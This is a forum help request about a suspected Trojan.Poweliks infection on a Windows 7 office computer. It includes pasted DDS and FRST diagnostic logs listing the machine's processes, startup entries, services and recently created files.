Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Trojan.Poweliks, multiple dllhost.exe, vsiouxphi.exe, *32 processes,


  • This topic is locked This topic is locked
3 replies to this topic

#1 Calvin2316

Calvin2316

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New York
  • Local time:08:29 AM

Posted 04 November 2014 - 02:46 PM

My client’s Windows 7 computer started to run sluggishly.  
 
I ran Stinger as well as client’s Norton.
 
Window Task Manager reveal many copies of:
 
dllhost.exe
conhost.exe  (Console Windows Host)
vsiouxphi.exe (Google Chrome)
 
and many scvhost.exe
 
 *32 processes running.  
 
Scans run by Norton showed no infection.
 
Any help appreciated.
 
I ran DDS and FRST the logs are enclosed.
 
Many thanks,
Calvin
------------------------------------------------------
DDS (Ver_2012-11-20.01) - NTFS_x86 
Internet Explorer: 11.0.9600.17344  BrowserJavaVersion: 1.6.0_26
Run by Server at 14:11:59 on 2014-11-04
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.2013.597 [GMT -5:00]
.
AV: Norton Internet Security *Enabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton Internet Security *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Realtek\Audio\HDA\AERTSrv.exe
C:\Program Files\Broadcom\BPowMon\BPowMon.exe
C:\Program Files\Century\TinyTERM\CenLPD.exe
C:\Program Files\iTivity\bin\connector_rc.exe
C:\Program Files\iTivity\bin\connector_rc.exe
C:\Program Files\iTivity\bin\processor_rc.exe
C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe
C:\Program Files\Norton Internet Security\Engine\21.6.0.32\NIS.exe
C:\PostgresPlus\8.3\bin\pg_ctl.exe
C:\Program Files\rmss\WIN_MONITOR.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
C:\Program Files\rmss\winprocmessage.exe
C:\Windows\system32\conhost.exe
C:\Program Files\rmss\win_server.exe
C:\Windows\system32\conhost.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\Windows\system32\conhost.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\MobileService.exe
C:\Program Files\Microsoft\BingBar\SeaPort.EXE
C:\Program Files\iTivity\bin\rfbd.exe
C:\MED\JDF\service\Wrapper.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Norton Internet Security\Engine\21.6.0.32\NIS.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Windows\system32\java.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\PrintIsolationHost.exe
C:\Program Files\ZocDoc\ZocDoc Alerter\Alerter.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe
C:\Program Files\HP\HP Software Update\hpwuschd2.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
C:\Windows\System32\regsvr32.exe
C:\Program Files\Jones Medical\SmartPrint APC\SmartPrintAPC.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\ctfmon.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\taskmgr.exe
C:\Program Files\Adobe\Adobe Captivate Quiz Results Analyzer\Adobe Captivate Quiz Results Analyzer.exe
C:\Windows\system32\dllhost.exe
C:\Users\Server\Desktop\FRST.exe
C:\Windows\explorer.exe
C:\Windows\System32\WUDFHost.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Windows\system32\conhost.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Windows\system32\DllHost.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
.
============== Pseudo HJT Report ===============
.
BHO: TmIEPlugInBHO Class: {1CA1377B-DC1D-4A52-9585-6E06050FAC53} - 
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - c:\program files\norton internet security\engine\21.6.0.32\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - c:\program files\norton internet security\engine\21.6.0.32\ips\ipsbho.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
BHO: Bing Bar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - 
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre6\bin\jp2ssv.dll
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
TB: Bing Bar: {8dcb7100-df86-4384-8842-8fa844297b3f} - 
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - c:\program files\norton internet security\engine\21.6.0.32\coieplg.dll
uRun: [Uploader] c:\program files\seagate\seagate dashboard 2.0\Seagate.Dashboard.Uploader.exe
uRun: [dmzsfmczo] regsvr32.exe /s "c:\users\server\appdata\local\{29e5c0cd-57b9-4f77-9ac8-3d2490b42522}\dmzsfmczo.dll"
mRun: [SwitchBoard] c:\program files\common files\adobe\switchboard\SwitchBoard.exe
mRun: [WinVNC] "c:\program files\itivity\bin\rfbd.exe" -servicehelper
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [Adobe Acrobat Speed Launcher] "c:\program files\adobe\acrobat 10.0\acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "c:\program files\adobe\acrobat 10.0\acrobat\Acrotray.exe"
mRun: [XeroxEndeavorBackgroundTask] rundll32.exe xrWCbgnd.dll,LaunchBgTask 1
mRun: [ZocDoc Alerter] c:\program files\zocdoc\zocdoc alerter\launcher.bat
mRun: [DBAgent] "c:\program files\seagate\seagate dashboard 2.0\DBAgent.exe" /WinStart
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\smartp~1.lnk - c:\program files\jones medical\smartprint apc\SmartPrintAPC.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: Append Link Target to Existing PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office12\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - c:\program files\windows live\writer\WriterBrowserExtension.dll
IE: {22CC3EBD-C286-43aa-B8E6-06B115F74162} - c:\program files\hewlett-packard\smartprint\smartprintsetup.exe
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
TCP: Interfaces\{0F9DC998-7064-4B0B-BDF8-404185767936} : NameServer = 192.168.1.1
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - 
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
Notify: igfxcui - igfxdev.dll
SSODL: WebCheck - <orphaned>
Hosts: 65.124.231.35 envoylinkbatch.webmd.com
Hosts: 198.31.9.13 wit.envoy.com
Hosts: 170.138.220.213 itsbatch.emdeon.com
Hosts: 170.138.220.169 its.emdeon.com
Hosts: 64.88.171.98 sts.sagehealth.com
.
Note: multiple HOSTS entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\server\appdata\roaming\mozilla\firefox\profiles\6arooxwm.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - component: c:\program files\adobe\acrobat 10.0\acrobat\browser\wcfirefoxextn\components\WCFirefox3Extn.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\FFQpBHO3.5.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\FFQpBHO3.6.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\hpWebPrinting35.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\hpWebPrinting36.dll
FF - component: c:\programdata\norton\{0c55c096-0f1d-4f28-aaa2-85ef591126e7}\nis_21.1.0.18\ipsff\components\IPSFF3.dll
FF - plugin: c:\program files\adobe\acrobat 10.0\acrobat\air\nppdf32.dll
FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\amazon\mp3 downloader\npAmazonMP3DownloaderPlugin101721.dll
FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
FF - plugin: c:\programdata\visan\plugins\npRLSecurePluginLayer.dll
.
---- FIREFOX POLICIES ----
FF - user.js: general.useragent.extra.brc - BRI/1
.
============= SERVICES / DRIVERS ===============
.
R0 SymDS;Symantec Data Store;c:\windows\system32\drivers\nis\1506000.020\symds.sys [2014-10-2 367704]
R0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\nis\1506000.020\symefa.sys [2014-10-2 936152]
R1 BHDrvx86;BHDrvx86;c:\program files\norton internet security\nortondata\21.1.0.18\definitions\bashdefs\20141030.001\BHDrvx86.sys [2014-11-3 1138392]
R1 ccSet_NIS;NIS Settings Manager;c:\windows\system32\drivers\nis\1506000.020\ccsetx86.sys [2014-10-2 127064]
R1 IDSVix86;IDSVix86;c:\program files\norton internet security\nortondata\21.1.0.18\definitions\ipsdefs\20141103.001\IDSvix86.sys [2014-11-3 476888]
R1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\nis\1506000.020\ironx86.sys [2014-10-2 209624]
R1 SymNetS;Symantec Network Security WFP Driver;c:\windows\system32\drivers\nis\1506000.020\symnets.sys [2014-10-2 447704]
R2 AERTFilters;Andrea RT Filters Service;c:\program files\realtek\audio\hda\AERTSrv.exe [2010-12-17 81920]
R2 BPowMon;Broadcom Power monitoring service;c:\program files\broadcom\bpowmon\BPowMon.exe [2009-8-17 79168]
R2 CenLPD;Century LPD;c:\program files\century\tinyterm\CenLPD.exe [2009-3-18 107976]
R2 CenNFS;Century Software, Inc. Century NFS Client for NT;c:\windows\system32\drivers\cennfs.sys [2011-2-18 138528]
R2 iTivityRCConnector;iTivity Unattended iAgent Connector Direct;c:\program files\itivity\bin\connector_rc.exe [2011-3-28 511771]
R2 iTivityRCConnectToIASConnector;iTivity Unattended iAgent Connector To IAS;c:\program files\itivity\bin\connector_rc.exe [2011-3-28 511771]
R2 iTivityRCController;iTivity Unattended iAgent Controller;c:\program files\itivity\bin\processor_rc.exe [2011-3-28 552159]
R2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\logmein\x86\LMIGuardianSvc.exe [2010-12-8 374152]
R2 LMIInfo;LogMeIn Kernel Information Provider;c:\program files\logmein\x86\rainfo.sys [2010-9-17 12856]
R2 LMIRfsDriver;LogMeIn Remote File System Driver;c:\windows\system32\drivers\LMIRfsDriver.sys [2011-2-1 47640]
R2 MMWin AppServer;MMWin AppServer;c:\program files\medical manager corporation\appserver\mmservice.exe [2011-2-1 110592]
R2 NIS;Norton Internet Security;c:\program files\norton internet security\engine\21.6.0.32\nis.exe [2014-10-2 276376]
R2 pg-plus-8.3;Postgres Plus 8.3 - Server;c:\postgresplus\8.3\bin\pg_ctl.exe runservice -w -n "pg-plus-8.3" -d "c:\postgresplus\8.3\data\" --> c:\postgresplus\8.3\bin\pg_ctl.exe runservice -w -N pg-plus-8.3 [?]
R2 Remote Monitoring;Remote Monitoring;c:\program files\rmss\win_monitor.exe [2011-3-28 94337]
R2 Seagate Dashboard Services;Seagate Dashboard Services;c:\program files\seagate\seagate dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [2014-2-10 16000]
R2 Seagate MobileBackup Service;Seagate MobileBackup Service;c:\program files\seagate\seagate dashboard 2.0\MobileService.exe [2014-2-10 157264]
R2 tridiavnc;Tridia Screen Server;c:\program files\itivity\bin\rfbd.exe [2011-3-28 473600]
R2 ultia;Ultia Server;c:\med\jdf\service\wrapper.exe -s c:\med\jdf\service\wrapper.conf --> c:\med\jdf\service\wrapper.exe -s c:\med\jdf\service\wrapper.conf [?]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\common files\symantec shared\eengine\EraserUtilRebootDrv.sys [2014-9-10 111408]
R3 NmPar;PCI Parallel Port;c:\windows\system32\drivers\NmPar.sys [2010-1-12 81920]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 rb_meddata_34083;Data Broker for c:\med\meddata;c:\med\medprogs\rbroker.exe [2011-3-29 645632]
S2 um_meddata_34083;Update Manager for c:\med\meddata;c:\python25\lib\site-packages\win32\pythonservice.exe [2009-7-5 8704]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]
S3 BBSvc;Bing Bar Update Service;c:\program files\microsoft\bingbar\BBSvc.EXE [2011-2-28 183560]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2014-10-16 108032]
S3 k57nd60x;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\k57nd60x.sys [2010-12-17 273960]
S3 pg-plus-8.3-replication;Postgres Plus 8.3 - Replication;c:\postgresplus\8.3\bin\slon.exe -service --> c:\postgresplus\8.3\bin\slon.exe -service [?]
S3 pg-plus-8.3-scheduler;Postgres Plus 8.3 - Scheduler;c:\postgresplus\8.3\bin\pgagent.exe run "pg-plus-8.3-scheduler" hostaddr=127.0.0.1 dbname=postgres user=postgres --> c:\postgresplus\8.3\bin\pgAgent.exe RUN pg-plus-8.3-scheduler [?]
S3 StorSvc;Storage Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 20992]
S3 SwitchBoard;Adobe SwitchBoard;c:\program files\common files\adobe\switchboard\SwitchBoard.exe [2010-2-19 517096]
S3 TridiaFTPServer;TridiaFTP Server;c:\program files\itivity\bin\ftpd.exe [2011-3-28 536640]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2011-3-4 52224]
S3 UsbGps;LGE CDMA USB GPS NMEA Port;c:\windows\system32\drivers\lgusbgps.sys [2014-3-28 19968]
S3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\wat\WatAdminSvc.exe [2011-2-1 1343400]
S3 WSDScan;WSD Scan Support via UMB;c:\windows\system32\drivers\WSDScan.sys [2009-7-13 20480]
.
=============== Created Last 30 ================
.
2014-11-04 18:39:41 -------- d-----w- C:\FRST
2014-10-31 20:28:57 -------- d-----w- c:\users\server\appdata\local\Seagate_Technology_LLC
2014-10-31 14:35:35 -------- d-----w- c:\program files\stinger
2014-10-31 14:01:47 0 ----a-w- c:\windows\system32\cnsvbuk.dll
2014-10-31 14:00:02 40960 ----a-w- c:\windows\system32\jvnnbbh.dll
2014-10-31 13:59:54 31232 ----a-w- c:\windows\system32\jxesd.dll
2014-10-30 17:20:08 -------- d-----w- c:\users\server\appdata\local\Programs
2014-10-30 17:19:10 -------- d-----w- c:\users\server\appdata\roaming\Roxio Log Files
2014-10-16 06:30:51 2363904 ----a-w- c:\windows\system32\msi.dll
2014-10-07 15:59:29 552224 ----a-w- c:\windows\system32\spool\prtprocs\w32x86\hpcpp170.dll
2014-10-07 15:58:30 167480 ----a-w- c:\windows\system32\hppccompio.dll
2014-10-07 15:58:30 134944 ----a-w- c:\windows\system32\hpmtp170.dll
2014-10-07 15:58:29 62752 ----a-w- c:\windows\system32\hpmpw081.dll
2014-10-07 15:58:29 55688 ----a-w- c:\windows\system32\hpmnque.dll
2014-10-07 15:58:29 55688 ----a-w- c:\windows\system32\hpmnndps.dll
2014-10-07 15:58:29 196896 ----a-w- c:\windows\system32\hpmml170.dll
2014-10-07 15:58:29 171296 ----a-w- c:\windows\system32\hpmja170.dll
2014-10-07 15:58:29 157984 ----a-w- c:\windows\system32\hpmpm081.dll
2014-10-07 15:58:29 103200 ----a-w- c:\windows\system32\hpmlm135.dll
2014-10-07 15:58:24 421664 ----a-w- c:\windows\system32\hpcpn170.dll
2014-10-07 15:58:23 119584 ----a-w- c:\windows\system32\hpcjpm.dll
2014-10-07 15:58:18 59928 ----a-w- c:\windows\system32\fxcompchannel.dll
2014-10-07 15:41:23 -------- d-----w- C:\HP Universal Print Driver
2014-10-07 15:27:17 20080 ----a-w- c:\program files\mozilla firefox\AccessibleMarshal.dll
2014-10-07 15:27:16 74864 ----a-w- c:\program files\mozilla firefox\breakpadinjector.dll
2014-10-07 15:27:16 2106216 ----a-w- c:\program files\mozilla firefox\D3DCompiler_43.dll
2014-10-07 15:27:15 47216 ----a-w- c:\program files\mozilla firefox\browser\components\browsercomps.dll
2014-10-07 15:27:08 3231696 ----a-w- c:\program files\mozilla firefox\d3dcompiler_46.dll
2014-10-07 15:27:06 800368 ----a-w- c:\program files\mozilla firefox\icuuc52.dll
2014-10-07 15:27:06 10397296 ----a-w- c:\program files\mozilla firefox\icudt52.dll
2014-10-07 15:27:06 1023600 ----a-w- c:\program files\mozilla firefox\icuin52.dll
2014-10-07 15:27:00 93808 ----a-w- c:\program files\mozilla firefox\webapprt-stub.exe
2014-10-07 15:27:00 25047152 ----a-w- c:\program files\mozilla firefox\xul.dll
.
==================== Find3M  ====================
.
2014-10-10 01:44:58 230912 ----a-w- c:\windows\system32\generaltel.dll
2014-10-10 01:44:35 396288 ----a-w- c:\windows\system32\aepdu.dll
2014-10-10 01:39:38 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-29 00:41:36 2379264 ----a-w- c:\windows\system32\win32k.sys
2014-09-25 22:32:04 2017280 ----a-w- c:\windows\system32\inetcpl.cpl
2014-09-25 14:26:48 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-25 14:26:48 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-25 01:40:50 519680 ----a-w- c:\windows\system32\qdvd.dll
2014-09-19 01:25:12 4201472 ----a-w- c:\windows\system32\jscript9.dll
2014-09-19 01:14:57 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-09-19 01:14:44 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-09-19 01:02:07 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-09-19 01:01:47 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-09-19 01:01:03 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-09-19 00:59:40 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-09-19 00:50:16 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-09-19 00:50:15 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-09-19 00:49:31 597504 ----a-w- c:\windows\system32\jscript9diag.dll
2014-09-19 00:44:23 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-19 00:36:23 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-09-19 00:18:55 1068032 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-09-18 23:59:11 1810944 ----a-w- c:\windows\system32\wininet.dll
2014-09-13 01:40:05 67072 ----a-w- c:\windows\system32\packager.dll
2014-09-09 21:47:10 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-04 05:04:15 372736 ----a-w- c:\windows\system32\rastls.dll
2014-08-26 02:20:22 664792 ----a-w- c:\windows\system32\drivers\nis\1506000.020\srtsp.sys
2014-08-26 02:20:22 32984 ----a-w- c:\windows\system32\drivers\nis\1506000.020\srtspx.sys
2014-08-23 01:46:55 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-06 19:48:16 209624 ----a-w- c:\windows\system32\drivers\nis\1506000.020\ironx86.sys
.
============= FINISH: 14:14:36.93 ===============
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 04-11-2014
Ran by Server (administrator) on MMSERV on 04-11-2014 13:44:07
Running from C:\Users\Server\Desktop
Loaded Profiles: Server & LogMeInRemoteUser & Dr. Shapiro & medadmin & postgres & medical (Available profiles: Server & LogMeInRemoteUser & Dr. Shapiro & medadmin & postgres & medical)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSrv.exe
(Broadcom Corp.) C:\Program Files\Broadcom\BPowMon\BPowMon.exe
() C:\Program Files\Century\TinyTERM\CenLPD.exe
(Tridia Corporation) C:\Program Files\iTivity\bin\connector_rc.exe
(Tridia Corporation) C:\Program Files\iTivity\bin\connector_rc.exe
(Tridia Corporation) C:\Program Files\iTivity\bin\processor_rc.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\mdm.exe
() C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe
(Symantec Corporation) C:\Program Files\Norton Internet Security\Engine\21.6.0.32\nis.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\pg_ctl.exe
() C:\Program Files\rmss\win_monitor.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
() C:\Program Files\rmss\winprocmessage.exe
() C:\Program Files\rmss\win_server.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
() C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\MobileService.exe
(Microsoft Corporation) C:\Program Files\Microsoft\BingBar\SeaPort.EXE
(Tridia Corporation) C:\Program Files\iTivity\bin\rfbd.exe
() C:\MED\JDF\service\Wrapper.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files\Norton Internet Security\Engine\21.6.0.32\nis.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Inc.) C:\Program Files\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Sun Microsystems, Inc.) C:\Windows\System32\java.exe
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(ZocDoc) C:\Program Files\ZocDoc\ZocDoc Alerter\Alerter.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Jones Medical) C:\Program Files\Jones Medical\SmartPrint APC\SmartPrintAPC.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
() C:\Program Files\Adobe\Adobe Captivate Quiz Results Analyzer\Adobe Captivate Quiz Results Analyzer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe
(Google Inc.) C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
(Google Inc.) C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
(Google Inc.) C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPCustPartic.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [WinVNC] => C:\Program Files\iTivity\bin\rfbd.exe [473600 2010-07-28] (Tridia Corporation)
